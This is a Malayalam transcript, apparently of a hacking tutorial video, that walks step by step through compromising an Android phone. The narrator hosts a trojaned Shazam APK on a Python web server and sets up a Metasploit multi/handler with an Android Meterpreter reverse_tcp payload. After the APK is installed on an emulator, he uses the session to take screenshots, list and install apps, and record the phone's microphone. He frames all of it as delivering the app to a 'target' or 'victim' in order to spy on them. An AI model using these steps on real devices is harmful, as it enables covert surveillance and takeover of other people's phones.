നമുക്കിത് സെൻഡ് ചെയ്യാം. ഓക്കെ, ഞാനിപ്പോൾ എന്ത് ചെയ്താൽ മതി, നമുക്കിത് എങ്ങനെയെങ്കിലും ടാർഗറ്റിന്റെ കമ്പ്യൂട്ടറിലേക്ക് ഡെലിവറി ചെയ്താൽ മതി, അല്ലെങ്കിൽ ടാർഗറ്റിന്റെ മൊബൈലിലേക്ക് ഡെലിവറി ചെയ്താൽ മതി. ഓക്കെ, ഞാനിപ്പോൾ ഇത് തൽക്കാലം എന്ത് ചെയ്യുന്നു, എൻ്റെ എവിടെ ഞാൻ ഇൻസ്റ്റാൾ ചെയ്ത് കാണിക്കുന്നത് ഈ പറയുന്ന LD പ്ലെയറിലാണ് കാണിക്കുന്നത്. ഓക്കെ, അപ്പൊ നമുക്ക് എന്ത് ചെയ്യണം, LD പ്ലെയറിലേക്ക് ഇതിനെ മാറ്റണം. ഓക്കെ, ദെൻ അതിന് വേണ്ടിയിട്ട് ഞാനിവിടെ പൈത്തൺ ഈ സർവർ അപ്പ് ചെയ്തുകൊണ്ടാണ് ഞാനിവിടെ മാറ്റുന്നത്. http.server ഒരു പോർട്ട് ഓപ്പൺ ആക്കി വെച്ചു. ഞാൻ ചെയ്യുന്നത് എന്താണെന്ന് ചോദിച്ചു കഴിഞ്ഞാൽ, എൻ്റെ ഈ ഒരു ഡയറക്ടറി ഉണ്ടല്ലോ, ഫാട്രാറ്റ് ഫയൽസ് എന്ന് പറയുന്ന ഈ ഒരു ഡയറക്ടറി, ആ ഡയറക്ടറി ഞാൻ എൻ്റെ നെറ്റ്വർക്കിലുള്ളവർക്കൊക്കെ ആക്സസ് ചെയ്യാൻ വേണ്ടിയിട്ട് ഒന്ന് സർവർ അപ്പ് ചെയ്തതാണ്. ഇനി എന്ത് ചെയ്യാം, ഈ കമ്പ്യൂട്ടറിലുള്ള അല്ലെങ്കിൽ ഏതൊരു ഡിവൈസിലുള്ള ഈ ഒരു നെറ്റ്വർക്കിലുള്ള ഏതൊരാൾക്കും എന്ത് ചെയ്യാൻ പറ്റും, ആ ഒരു ഫയൽ ആക്സസ് ചെയ്യാൻ പറ്റും. ഓക്കെ, അപ്പോൾ എന്തായി, എൻ്റെ IP അഡ്രസ് എനിക്കറിയാം 16 ആയിരുന്നു. ഞാൻ ഇവിടുന്ന് ഒരു ബ്രൗസർ എടുക്കുന്നു, ആ IP അഡ്രസ് കൊടുക്കുന്നു 192.168.15.16.90. യെസ്, ഇതാണ് APK ഫയൽ. ആ APK ഫയൽ ഇവിടെ കാണാൻ പറ്റുന്നുണ്ട്. ഈ APK ഫയൽ ഞാൻ എന്ത് ചെയ്യണം, ഡൗൺലോഡ് ചെയ്യണം. ഇവിടെ നിന്ന് എനിക്ക് എന്ത് ചെയ്തു, ഞാനത് ക്ലിക്ക് ചെയ്തു
അതെന്ത് ചെയ്തു, ഡൗൺലോഡ് ചെയ്ത് വെച്ചു. ഇപ്പം എൻ്റെ ഈ ഒരു ഡിവൈസിൽ എന്തുണ്ട്, ഈ ഒരു ആപ്ലിക്കേഷൻ ഇവിടെ ഡൗൺലോഡ് ചെയ്ത് കിടക്കുന്നുണ്ടാവും. ഓക്കെ, ഈ ഫയൽ ഇവിടെ ഉണ്ട്, ഡൗൺലോഡ്സിലുണ്ടാവും. ഇതാക്കണം, ഇവിടെ shazam.apk എന്ന് പറയുന്ന ഫയൽ ഇവിടെ കിടക്കുന്നുണ്ട്. ഇനി എന്ത് ചെയ്യണം, അവരിത് ഓപ്പൺ ആക്കുമ്പോൾ അവരുടെ കമ്പ്യൂട്ടറിന്റെ ആക്സസ് എനിക്ക് കിട്ടണം. അതാണല്ലോ, ഞാൻ എന്ത് ചെയ്യുന്നു, പുതിയൊരു ടെർമിനൽ എടുക്കുന്നു. ദെൻ അവിടെ നിങ്ങൾ കൊടുക്കുക MSF കൺസോൾ -Q. ഓക്കെ, MSF കൺസോൾ അതായാലും മാത്രമായാലും മതി. ഏറ്റവും നല്ലത് MSF കൺസോൾ -Q. കുറെ പിക്ചറും കാര്യങ്ങളും ഒഴിവാക്കാൻ വേണ്ടി മാത്രമാണ് -Q കൊടുക്കുന്നത്. MSF കൺസോൾ എന്ന് കൊടുത്താലും കുഴപ്പമില്ല. MSF കൺസോൾ -Q എന്ന് കൊടുക്കുക. ഓക്കെ, ഇതൊരു വലിയൊരു ഫ്രെയിംവർക്ക് ആണ്. പോസ്റ്റ് എക്സ്പ്ലോയിറ്റേഷനും ഒക്കെ വേണ്ടി യൂസ് ചെയ്യുന്ന ഒരു വലിയൊരു ഫ്രെയിംവർക്ക് ആണ് MSF കൺസോൾ എന്ന് പറയുന്നത്. ഓക്കെ, ദെൻ സെർച്ച്. ഇതൊക്കെ MSF കൺസോൾ ഒക്കെ നമുക്ക് ഡീറ്റെയിൽ ആയിട്ട് ഒരുപാട് കാര്യങ്ങൾ പഠിക്കാനായിട്ട് കേട്ടോ. ഇവിടെ ഈ ഒരു ആൻഡ്രോയിഡ് ഫോൺ ഹാക്കിംഗ് മാത്രമല്ല, ഒരുപാട് കാര്യങ്ങൾ ഹാക്ക് ചെയ്യാൻ, ഒരുപാട് ഫ്രെയിംവർക്കുകൾ, ഒരുപാട് വെബ്സൈറ്റുകൾ ഒക്കെ ഹാക്ക് ചെയ്യാൻ യൂസ് ചെയ്യുന്ന ഒരു വലിയൊരു ഫ്രെയിംവർക്കാണ് MSF കൺസോൾ. അതിൻ്റെ ഒരു ചെറിയ ഭാഗം മാത്രമേ നമ്മൾ യൂസ് ചെയ്യുന്നുള്ളൂ. സെർച്ച് ഹാൻഡ്ലർ, സെർച്ച് മൾട്ടി ഹാൻഡ്ലർ. ഓക്കെ, സെർച്ച് മൾട്ടി ഹാൻഡ്ലർ. ദെൻ നമ്മളിവിടെ എന്ത് ചെയ്യുന്നു, മൾട്ടി ഹാൻഡ്ലർ ഇവിടെ കാണുന്നുണ്ട്. ഞാൻ എന്ത് ചെയ്യുന്നു, അത് യൂസ് ചെയ്യുന്നു. ഓക്കെ, യൂസ് 7. ഓക്കെ, യൂസ് 7 ഞാനത് കൊടുത്തു. ഇപ്പം എന്തായി, ഞാൻ മൾട്ടി ഹാൻഡ്ലർ. എന്തിനാണ് മൾട്ടി ഹാൻഡ്ലർ എന്ന് ചോദിച്ചു കഴിഞ്ഞാൽ, നമ്മൾ അവരോട് പറഞ്ഞു, ആ APK ഫയലിനോട് പറഞ്ഞു എന്താണ്, ആ APK ഫയൽ ഇനി അവരുടെ കമ്പ്യൂട്ടറിൽ അല്ലെങ്കിൽ മൊബൈലിൽ ഇൻസ്റ്റാൾ ചെയ്യുമ്പോൾ നമ്മളുടെ കമ്പ്യൂട്ടറിലേക്ക് കണക്ഷൻ വരണം. നമ്മളുടെ കമ്പ്യൂട്ടറിലേക്ക് കണക്ഷൻ വന്നു കഴിഞ്ഞാൽ ആ കണക്ഷൻ എടുത്ത് നമുക്ക് കാണിച്ചു തരാൻ നമുക്കൊരു ഭാഗം വേണം. നമ്മൾ ആ വാതിൽ തുറന്ന് അവരെ വെയിറ്റ് ചെയ്ത് നിൽക്കണം. ഓക്കെ, അതിന് നമ്മൾ ഇവിടെ പറയും ലിസണർ ഓപ്പൺ ആക്കി വെക്കണം, അല്ലെങ്കിൽ ലിസൺ ചെയ്ത് നിൽക്കണം എന്ന് പറയും. അപ്പൊ കണ്ടിന്യൂസ് ആയിട്ട് ലിസൺ ചെയ്ത് നിൽക്കാൻ വേണ്ടിയിട്ടാണ് നമ്മൾ MSF കൺസോൾ വഴി അവിടെയുള്ള മൾട്ടി ഹാൻഡ്ലർ എന്ന് പറയുന്ന ഈ ഒരു മൊഡ്യൂൾ നമ്മൾ യൂസ് ചെയ്തിട്ടുള്ളത്. ഓക്കെ, എന്ന് പറഞ്ഞു കഴിഞ്ഞാൽ അവർ അവിടെ ആ ആപ്ലിക്കേഷൻ ഓപ്പൺ ആക്കുമ്പോൾ നമുക്ക് റിവേഴ്സ് കണക്ഷൻ കിട്ടണം. എന്നിട്ട് എന്ത് ചെയ്യണം, നമുക്കത് മാനേജ് ചെയ്യാനൊക്കെ പറ്റണം, അത് ആക്സസ് ചെയ്യാനൊക്കെ പറ്റണം. അതിനുവേണ്ടി നമുക്കൊരു ഫ്രെയിംവർക്ക് വേണം, അതിന് കൺട്രോൾ ചെയ്യാൻ നമുക്കൊരു സ്ഥലം വേണമല്ലോ. അതാണ് നമുക്ക് എന്ത് പറയുന്നത്, MSF കൺസോൾ എന്ന് പറയുന്നത്. ഓക്കെ, ഇപ്പൊ ഞാൻ എന്ത് ചെയ്തു, ഈ മൾട്ടി ഹാൻഡ്ലർ എന്ന് പറയുന്ന ഈ ഒരു ഓപ്ഷൻ സെലക്ട് ചെയ്തു. എന്താ ചെയ്തത്, ജസ്റ്റ് അതൊന്ന് സെർച്ച് ചെയ്തു. സെർച്ച് മൾട്ടി ഹാൻഡ്ലർ എന്ന് സെർച്ച് ചെയ്തു. ദെൻ ഇവിടെ നിങ്ങൾക്ക് കാണാൻ പറ്റുന്നതാണ് 7ാമത്തത് എക്സ്പ്ലോയിറ്റ് മൾട്ടി ഹാൻഡ്ലർ. ഞാൻ എന്ത് ചെയ്തു, യൂസ് 7 എന്ന് കൊടുത്തു. അപ്പം ഞാനത് സെലക്ട് ചെയ്തു. ഇനി എന്താ വേണ്ടത്, ഇതിലേക്ക് കുറെ വാല്യൂസ് സെറ്റ് ചെയ്യണം. അത് കാണാൻ വേണ്ടിയിട്ട് ഓപ്ഷൻസ് എന്ന് കൊടുത്തു. അപ്പൊ എനിക്കിവിടെ കുറച്ച് കാര്യങ്ങൾ സെറ്റ് ചെയ്യാണ്ട്. എൽ ഹോസ്റ്റ് എന്താണ്, നമ്മുടെ കമ്പ്യൂട്ടർ തന്നെയാണ്. അപ്പൊ നമ്മൾ അത് സെറ്റ് ചെയ്ത് കൊടുക്കണം. അതെങ്ങനെ സെറ്റ് ചെയ്ത് കൊടുക്കുക, സെറ്റ് എൽ ഹോസ്റ്റ് 192.168.1.16. ഇതല്ല നമ്മൾ അവിടെ കൊടുത്ത IP അഡ്രസ്സ് സെറ്റ് ചെയ്ത് കൊടുക്കണം. അതേപോലെ പോർട്ട് നമ്പർ നമ്മൾ അവിടെ കൊടുത്തിട്ടുണ്ടായിരുന്നു, സെറ്റ് എൽ പോർട്ട് 5454 കൊടുത്ത് ഓർമ്മയില്ലേ, അതും നമ്മളിവിടെ സെറ്റ് ചെയ്ത് കൊടുക്കണം. ഇനി അത് മാത്രമല്ല, നമ്മൾ അവിടെ നമ്മുടേതായ ഒരു പേലോഡ് യൂസ് ചെയ്തിട്ടുണ്ടായിരുന്നു, ഓർമ്മയുണ്ടല്ലോ. ആ പേലോഡും ഇവിടെ മാറ്റി കൊടുക്കണം. സെറ്റ് പേലോഡ് എന്തായിരുന്നു നമ്മൾ കൊടുത്ത പേലോഡ്, ആൻഡ്രോയിഡ് മീറ്റർ പ്രീറ്റർ റിവേഴ്സ് TCP. നമ്മളത് അവിടെ കൊടുത്തിട്ടുണ്ടായിരുന്നു. ഓക്കെ, അതും ഞാൻ എന്ത് ചെയ്തു, സെറ്റ് ചെയ്ത് കൊടുത്തു. അപ്പൊ നമ്മളിവിടെ പേലോഡ് സെറ്റ് ചെയ്ത് കൊടുത്തു. എൽ പോർട്ട്, നമ്മളുടെ ഡിവൈസിൽ ഒരു പോർട്ട് ഉണ്ടല്ലോ, ലോക്കൽ ഡിവൈസ് ആണ് ഉദ്ദേശിച്ചത്, ലോക്കൽ ഹോസ്റ്റ് ആണ്. ലോക്കൽ ഹോസ്റ്റിന് ഒരു പോർട്ട്, നമ്മുടെ ഡിവൈസിൽ ഒരു പോർട്ട് നമ്മൾ ഓപ്പൺ ആക്കി വെക്കണ്ടേ, അതാണ് 5454. ദെൻ IP അഡ്രസ്സ്, നമ്മുടെ ഡിവൈസിന്റെ ഈ ഒരു കമ്പ്യൂട്ടറിന്റെ IP അഡ്രസ്സ്, ഇതെല്ലാം സെറ്റ് ചെയ്ത് വെച്ചു. അപ്പൊ എന്താ നമ്മൾ ചുരുക്കി പറഞ്ഞത്, എൻ്റെ കമ്പ്യൂട്ടർ എന്ന് പറഞ്ഞാൽ ഈ ഡിവൈസിന്റെ 5454 എന്ന് പറയുന്ന വാതിൽ തുറന്നു വെക്കണം. അവിടെ ആര് വരാനുണ്ട്, ഈ പേലോഡും കൊണ്ട് ഒരാൾ വരുന്നുണ്ട്, അയാൾക്കും വേണ്ടി ഇത് തുറന്നു വെക്കണം. അപ്പൊ ഇതിനി നമ്മൾ എന്ത് ചെയ്യണം, റൺ ചെയ്യണം. റൺ. ഓക്കെ, റൺ എന്ന് കൊടുത്തിട്ട് എൻ്റർ അടിക്കുക. ഇപ്പൊ എന്താ നമ്മളുടെ കമ്പ്യൂട്ടർ ചെയ്തുകൊണ്ടിരിക്കുന്നത്, നമ്മളുടെ കമ്പ്യൂട്ടർ ഇതാക്കണം, അവനെ ലിസൺ ചെയ്തുകൊണ്ടിരിക്കുകയാണ്, അവനെ വെയിറ്റ് ചെയ്തുകൊണ്ടിരിക്കുകയാണ്. ഇനി അവൻ വരാൻ വേണ്ടിയിട്ട് കാത്തിരിക്കുകയാണ്. ഓക്കെ, അവരവിടെ കാത്തിരിക്കട്ടെ. ഇനി എന്ത് ചെയ്യണം, നമ്മൾ തിരിച്ച് നമ്മളുടെ LD പ്ലെയറിൽ പോവുക.
ഈ shazam.apk എന്ന് പറയുന്ന ഈ ഫയൽ എന്ത് ചെയ്യാം, നമ്മൾ ഇൻസ്റ്റാൾ ചെയ്യാം. ഓക്കെ, അത് ഓപ്പൺ ആക്കുമ്പോൾ എന്താണ് നടക്കുന്നതെന്ന് ഇപ്പുറത്ത് കണ്ടോളൂ. ഓക്കെ, നമ്മൾ ആപ്ലിക്കേഷൻ ഇൻസ്റ്റാൾ ചെയ്യുന്ന പോലെ തന്നെ ഇവിടെ കാണിച്ചു തരുന്നുണ്ട്. ഡബിൾ ക്ലിക്ക് ചെയ്തപ്പോൾ ഇൻസ്റ്റാൾ ചെയ്യണമെന്ന് ചോദിച്ചു. അപ്പോൾ ഞാൻ ഇൻസ്റ്റാൾ എന്ന് കൊടുത്തു. ദെൻ ഇൻസ്റ്റാൾ ആയിട്ടുണ്ട്. ആപ്ലിക്കേഷൻ എന്തായി, ഇൻസ്റ്റാൾ ആയി. ഇത് ഓപ്പൺ ചെയ്യണമെന്ന് ഇവിടുന്ന് ചോദിക്കുന്നുണ്ട്. ഇവിടുന്ന് നമുക്ക് ഓപ്പൺ ചെയ്യാം, അല്ലാന്നുണ്ടെങ്കിൽ നമുക്ക് എന്ത് ചെയ്യാം, ഹോം പേജിൽ പോയി കഴിഞ്ഞാൽ ആപ്ലിക്കേഷൻ അവിടെ ഉണ്ടാവും. നമ്മളുടെ ഷസം ആപ്ലിക്കേഷൻ അവിടെ ഉണ്ട്. ഇനി ഞാൻ എന്ത് ചെയ്യണം, ഷസം ആപ്ലിക്കേഷനെ ഇൻസ്റ്റാൾ ചെയ്തു. വിക്ടിം ഇപ്പം എന്ത് ചെയ്തു, ആ ഒരു ആപ്ലിക്കേഷൻ ഇൻസ്റ്റാൾ ചെയ്തു. ഇനി എന്താണ്, ഷസം ആപ്ലിക്കേഷൻ അയാൾ ഓപ്പൺ ആക്കുകയാണ്. ഓക്കെ, ഷസം ആപ്ലിക്കേഷൻ ഓപ്പൺ ആക്കി. എന്താണ് നമുക്കിവിടെ കിട്ടിയത് നോക്കേ, എക്സ്പ്ലോയിറ്റേഷൻ നടന്നു. അവരുടെ കമ്പ്യൂട്ടറിൻ്റെ അല്ലെങ്കിൽ മൊബൈലിൻ്റെ ഒരു ആക്സസ് നമുക്ക് കിട്ടി. നമുക്ക് അവിടെ ഒരു മീറ്റർ ഷെല്ല് കിട്ടി. കാരണം നമ്മൾ അങ്ങനെ ഒരു പേലോഡ് ആയിരുന്നു സെറ്റ് ചെയ്ത് കൊടുത്തത്. നമുക്ക് എന്തായി, മീറ്ററിൻ്റെ ഷെല്ല് കിട്ടി. ഇപ്പൊ അവരുടെ മൊബൈൽ നോക്കേ, ആപ്ലിക്കേഷൻ ഷസം എന്ന് പറഞ്ഞ ആപ്ലിക്കേഷൻ എന്താ നമുക്ക് അറിയില്ലേ. അതെന്താണ്, നമ്മളൊരു സോങ്സ് കേൾപ്പിച്ചു കൊടുത്തു കഴിഞ്ഞാൽ ആ സോങ്സ് എവിടെ ഉള്ളതാണ് എന്ന് ലിസ്റ്റ് ചെയ്യുന്ന ഒരു പ്ലാറ്റ്ഫോമാണ്. ഓക്കെ, അപ്പോൾ ആ ഒരു ആപ്ലിക്കേഷൻ എന്താണ്, ജെനുവിൻ ആയിട്ട് വർക്ക് ചെയ്യുന്നുണ്ട്. നമുക്കൊരു ജസ്റ്റ് ഒരു സോങ്സ് കേൾപ്പിച്ച് നോക്കാം. ഓക്കെ, ജസ്റ്റ് എന്താണ്, ഇതാണ് ഈ ഒരു ആപ്ലിക്കേഷന്റെ വർക്കിംഗ്. നമ്മളൊരു പാട്ട് കേൾപ്പിച്ചു കഴിഞ്ഞാൽ ആ പാട്ട് ലിസ്റ്റ് ചെയ്ത് കാണിച്ചു തരും. ആപ്ലിക്കേഷൻ നോക്കെ ജെനുവിനായിട്ട് വർക്ക് ചെയ്യുന്നുണ്ട്, ഒരു പ്രശ്നമല്ല. നമ്മൾ ഏത് പാട്ട് കേൾപ്പിച്ചു കൊടുത്തു കഴിഞ്ഞാലും എന്ത് ചെയ്യുന്നുണ്ട്, ആ ആപ്ലിക്കേഷൻ അവിടെ വർക്ക് ആവുന്നുണ്ട്, ഒരു കുഴപ്പമില്ല. ആപ്ലിക്കേഷൻ നമുക്ക് എന്ത് ചെയ്യാം, ക്ലോസ് ചെയ്തിട്ട് നമ്മൾ ഇവിടെ എന്ത് ചെയ്യുന്നു, വേറെ ആപ്ലിക്കേഷനും കാര്യങ്ങളൊക്കെ നമുക്ക് യൂസ് ചെയ്യാം. പക്ഷെ അത് എന്ത് ചെയ്തു, ഒരു തവണ നമ്മൾ ഓപ്പൺ ചെയ്താൽ തന്നെ എന്തായി, നമുക്കിവിടെ കണക്ഷൻ കിട്ടി. കണ്ടോ, നമുക്കിവിടെ ഒരു സെഷൻ ഓപ്പൺ ആയി, അവരുടെ മൊബൈലിന്റെ ആക്സസ് കിട്ടി. എന്ത് ഹെൽപ്പ് അടിച്ച് നോക്കുക, ഇവിടെ കൊടുക്കേണ്ട കമാൻഡുകൾ എന്തൊക്കെയാണെന്നുള്ളത് ഇവിടെ കാണിച്ചു തരും. ഓക്കെ, നമുക്കിവിടെ എന്തൊക്കെ ചെയ്യാൻ പറ്റും, സ്ക്രീൻഷോട്ട് എടുക്കാൻ പറ്റും. ഓക്കെ, സ്ക്രീൻഷോട്ട് ഞാനിവിടെ എന്ത് ചെയ്യുന്നു, ഇവിടെ നമ്മൾ സ്ക്രീൻഷോട്ട് ഒന്ന് ടൈപ്പ് ചെയ്യുന്നു, സ്ക്രീൻഷോട്ട്. ഓക്കെ, ഒരു സ്ക്രീൻഷോട്ട് ഇപ്പോൾ ഇതാക്കണ എൻ്റെ കമ്പ്യൂട്ടറിൽ സ്റ്റോർഡായി. എന്താണോ ഓപ്പൺ ആക്കിയ ഇമേജ്, അവിടെ എന്താണോ ഉണ്ടായിരുന്നത് അതിൻ്റെ ഒരു സ്ക്രീൻഷോട്ട് ഇപ്പോൾ എൻ്റെ കമ്പ്യൂട്ടറിലേക്ക് വന്നു. ഓക്കെ, ഈ കണക്ഷൻ ഇതൊക്കെ ഇനി നമുക്ക് ഓഫ് ചെയ്യാം കേട്ടോ, ഇതൊന്നും ഇനി നമുക്ക് ആവശ്യമില്ല. ഇനി എന്ത് ചെയ്യുന്നു, ജസ്റ്റ് ഞാനിവിടെ ഓപ്പൺ ആ ഒരു സ്ക്രീൻഷോട്ട് അവിടെ പാത്ത് കണ്ടായിരുന്നു, കണ്ടോ, ആ മൊബൈലിൻ്റെ ഒരു ഡിസ്പ്ലേ സ്ക്രീന് നമുക്കിവിടെ കാണാൻ പറ്റുന്നുണ്ട്. ദെൻ ഇനി അടുത്ത ടാസ്ക് എന്താണ്, ഇവിടെ പറയുന്നുണ്ട് വേറെയും നമുക്ക് വേറെ എന്തെങ്കിലും കാര്യങ്ങൾ ഉണ്ടെന്നുണ്ടെങ്കിൽ നമുക്ക് എന്തെങ്കിലും ഒരു കാര്യം ഇവിടെ പ്ലേ ചെയ്യാൻ പറ്റും. ഓക്കെ, ഞാൻ എൻ്റെ കമ്പ്യൂട്ടറിൽ എന്തെങ്കിലും ഓഡിയോസ് ഉണ്ടോ നോക്കാം, അല്ലെങ്കിൽ ഞാനൊന്ന് ഡൗൺലോഡ് ചെയ്തിട്ടാ. ഓക്കെ, ഇവിടെ ഒരു സോങ് ഉണ്ട്, നമുക്ക് ഇതൊന്ന് പ്ലേ ചെയ്ത് നോക്കാം. പ്ലേ ഫുൾ പാത്ത് കൊടുക്കണം നമ്മൾ. എന്താണ് /home കാലി ഡൗൺലോഡ്സ്, അവിടെ ആ ഫയലിൻ്റെ പേര് ഇതായിരുന്നു. ഓക്കെ, പ്ലേ ആവുന്നുണ്ടോ നോക്കാം. യെസ്, പ്ലേ ആവുന്നുണ്ട്. ഓക്കെ, നിങ്ങൾ കേൾക്കുന്നുണ്ടോ അറിയില്ല, പ്ലേ ആവുന്നുണ്ട്. ഇതാ ഞാൻ ശബ്ദത്തിലൊന്ന് ഓപ്പൺ ആക്കി നോക്കിയാൽ അത് ഏതാണ് സോങ് എന്നുള്ളത് കാണിച്ചു തരും. ഓക്കെ, ശബ്ദത്തിൽ ആ പാട്ട് ഏതാണെന്നുള്ളത് കാണിച്ചു തരുന്നുണ്ട്. കാരണം എന്താണ്, നമ്മൾ ഇവിടെ നിന്നുകൊണ്ട് അവിടെയുള്ള ഡിവൈസിനെ നമ്മൾ എന്ത് ചെയ്തു, കൺട്രോൾ ചെയ്തു. ഓക്കെ ഓക്കെ ഇതാണ് നമ്മൾ എന്ത് പറയുന്നത് ഫാക്ട് ട്രാക്ക് ടൂൾ എന്ന് പറയുന്നത്. അവിടെയുള്ള കാര്യങ്ങളൊക്കെ ഇനി നമുക്ക് എന്ത് ചെയ്യാൻ പറ്റും, പുതിയൊരു ആക്ടിവിറ്റി, പുതിയൊരു എന്താ പറയുക, ഒരു ആപ്ലിക്കേഷൻ നമുക്ക് അവിടെ ഇനി ഏതൊക്കെ പ്രോസസ്സുകളുണ്ട് ഇതൊക്കെ നമുക്ക് അവിടെ നിന്ന് കാണാനും. ഇപ്പോൾ നമുക്ക് PS എന്ന് അടിച്ചു കഴിഞ്ഞാൽ അവിടെ ഇപ്പോൾ ഏതൊക്കെ ആപ്ലിക്കേഷൻസുകൾ ഓപ്പൺ ആണ്, ഇങ്ങനെയുള്ള ഇൻഫർമേഷൻസ് നമുക്ക് കിട്ടാൻ പറ്റും. കാരണം അവിടെ ആകെ ഞാനിപ്പോൾ ഷസം മാത്രമേ ഓപ്പൺ ആക്കിയിട്ടുള്ളൂ. വേറെ ഏതെങ്കിലും ഒരു ആപ്ലിക്കേഷൻ അവിടെ ഉണ്ടെന്നുണ്ടെങ്കിൽ എന്ത് ചെയ്യാൻ പറ്റും, ആ ആപ്ലിക്കേഷന് നമുക്ക് ഓപ്പൺ ചെയ്യാൻ പറ്റും. ഓക്കെ, അങ്ങനെയുള്ള പല ആക്ടിവിറ്റീസും നമുക്ക് എന്ത് ചെയ്യാൻ പറ്റും, ഇവിടെ
ചെയ്യാൻ പറ്റും. ഇപ്പം നമുക്ക് എന്താണ് അവിടെ ഒരു ഷെല്ല് കിട്ടിയേക്കാണ്, അവരുടെ ഡയറക്ടറി, അവരുടെ മൊബൈലിൽ ഇപ്പോൾ എന്തൊക്കെ ആപ്ലിക്കേഷൻസ് ഉണ്ട്, ടൂളുകളുണ്ട്. എനിക്ക് എന്ത് ചെയ്യാൻ പറ്റും, PWD. ഓക്കെ, ഇപ്പം ഞാൻ നിൽക്കുന്നത് അവരുടെ ഈ ഒരു ഡയറക്ടറിയിലാണ്. അപ്പം എനിക്ക് എന്ത് ചെയ്യാൻ പറ്റും, അവരുടെ മറ്റു ഡയറക്ടറികൾ എനിക്ക് ആക്സസ് ചെയ്യാൻ പറ്റും. ഓക്കെ, ഇവിടെ വേറെയും ആക്ടിവിറ്റീസുകളുണ്ട്, നിങ്ങൾക്ക് അതൊക്കെ ചെക്ക് ചെയ്ത് നോക്കാം. ഫോർ എക്സാമ്പിൾ റെക്കോർഡ് മൈക്ക്, നമുക്ക് എന്ത് ചെയ്യാം, മൈക്ക് റെക്കോർഡ് ചെയ്യാൻ പറ്റും. ജസ്റ്റ് ഈ ഒരു കമാൻഡ് കോപ്പി ചെയ്യാം. അതേപോലെ ക്യാമറ പിക്ചർ എടുക്കാനും പറ്റും, പക്ഷേ ഇവിടെ ഞാൻ വിർച്വൽ LD പ്ലെയറിലാണ്. LD പ്ലെയറിന് ക്യാമറ ഇല്ല, അതുകൊണ്ട് പോസിബിൾ അല്ല. പക്ഷെ ഇതൊരു മൊബൈലിലാണെന്നുണ്ടെങ്കിൽ അത് നമുക്ക് പോസിബിൾ ആണ്. വെബ് ക്യാം, അതേപോലെ സ്ക്രീൻ ഷെയർ, ഇതൊക്കെ നമുക്ക് നടക്കും. ഓക്കെ, റെക്കോർഡ് മൈക്ക് കൊടുക്കുക, -D. ഞാൻ എന്ത് ചെയ്തു, ഒരു സമയം കൊടുക്കണം, എത്ര മിനിറ്റ് വരെ എന്നുള്ള ഒരു സമയം കൊടുക്കണം. ഓക്കെ, റെക്കോർഡ് മൈക്ക് എത്ര മിനിറ്റ് എന്നുള്ളൊരു സമയം കൊടുക്കണം. കൊടുത്തു കഴിഞ്ഞാൽ ഒരു 10 സെക്കൻഡിൽ നേരത്തേക്ക് എന്ത് ചെയ്യും, ഒരു ഓഡിയോ ഫയൽ ഇവിടെ റെക്കോർഡായിട്ട് സ്റ്റോർ ചെയ്ത് വെക്കുന്നുണ്ട്. ഓക്കെ, കുറച്ചുകൂടി ഇത് സമയം കൂട്ടി കൊടുക്കണേ, പെട്ടെന്നാക്കരുത്. ഞാനത് വളരെ പെട്ടെന്നാക്കി, കുറച്ച് സമയം കൊടുക്കണം. ഓക്കെ, നമ്മൾ പറയുന്ന അവിടെ ആ ഫോണിൻ്റെ മൈക്കാണ് റെക്കോർഡ് ആവുന്നത്. ഇവിടെ ഞാൻ എൻ്റെ ഫോണിൽ അല്ല ലാപ്പിൽ ഹെഡ്സെറ്റ് കണക്ട് ചെയ്തിട്ടുണ്ട്. ഓക്കെ, അപ്പോൾ നിങ്ങൾ എന്ത് ചെയ്യാൻ പറ്റും, ഇതുവഴി നിങ്ങൾക്ക് അവരുടെ ഫോൺ റെക്കോർഡിങ്സ്, അവിടെ അവരെന്താണ് സംസാരിക്കുന്നത് എന്നുള്ളത്, അല്ലെങ്കിൽ ആ ഫോണിൻ്റെ മൈക്ക് ഓൺ ആക്കിയിട്ട് അത് റെക്കോർഡ് ചെയ്തിട്ട് സൂക്ഷിക്കാൻ പറ്റും. അതുപോലെ തന്നെ വെബ് ക്യാം നമുക്ക് ചെയ്യാൻ പറ്റും. പക്ഷേ ഇതാ ഇവിടെ ഉണ്ട് വെബ് ക്യാം ലിസ്റ്റ്, ഏതൊക്കെ ക്യാമറാസ് ഉണ്ട് എന്നുള്ളതിലൂടെ ലിസ്റ്റ് ഔട്ട് ചെയ്യും, അത് നമുക്ക് യൂസ് ചെയ്യാം. ദെൻ പ്രധാനമായിട്ട് ആപ്പ് ലിസ്റ്റ്, നമുക്ക് ഏതെങ്കിലും ആപ്പ് അവരുടെ മൊബൈലിൽ ഇൻസ്റ്റാൾ ചെയ്യണമെന്നുണ്ടെങ്കിൽ നമുക്ക് ഈ ആപ്പ് ഇൻസ്റ്റാൾ വഴി അത് ഇൻസ്റ്റാൾ ചെയ്യാം കേട്ടോ. എനിക്ക് എന്ത് ചെയ്യണം, ഏതെങ്കിലും ഒരു APK ഫയൽ അവരുടെ മൊബൈലിൽ ഇൻസ്റ്റാൾ ചെയ്യണമെന്നുണ്ടെങ്കിൽ ഈ ആപ്പ് ഇൻസ്റ്റാൾ വഴി ഇൻസ്റ്റാൾ ചെയ്യാൻ പറ്റും. ദെൻ ആപ്പ് ലിസ്റ്റ്, അവിടെ വേറെ ഏതൊക്കെ ആപ്ലിക്കേഷൻസ് ഉണ്ട് എന്ന് കാണാൻ വേണ്ടിയിട്ട് ആപ്പ് ലിസ്റ്റ് കൊടുക്കുക. ഓക്കെ, ഇത്രയും ആപ്ലിക്കേഷൻസ് അവരുടെ മൊബൈലിലുണ്ട്. അത് ഏതൊക്കെയാണെന്നുള്ളത് സിസ്റ്റത്തിലുള്ളത് കാണിക്കുന്നുണ്ട്. അതിലിപ്പോൾ ഏതൊക്കെ റണ്ണിങ് ആണെന്നുള്ള ഇൻഫർമേഷനും കാണിക്കുന്നുണ്ട്. ഓക്കെ, നമ്മളിതിലിപ്പോൾ അവിടെ ഷസം മാത്രമേ നമ്മളവിടെ റൺ ചെയ്തിട്ടുള്ളൂ. അപ്പോൾ സ്വാഭാവികമായിട്ടും അവിടെ ഷസം എന്നുള്ളൊരു ആപ്ലിക്കേഷൻ മാത്രം അവിടെ കാണിച്ചു തരുന്നു. നമുക്ക് എന്ത് ചെയ്യാം, വേറെയും ആപ്ലിക്കേഷൻസ് അവിടെ റൺ ചെയ്ത് നോക്കാം. അങ്ങനെ നമുക്ക് ഇവിടെ ആപ്ലിക്കേഷൻസിൻ്റെ പേര് കിട്ടുന്നുണ്ട്. ഇതാണ് 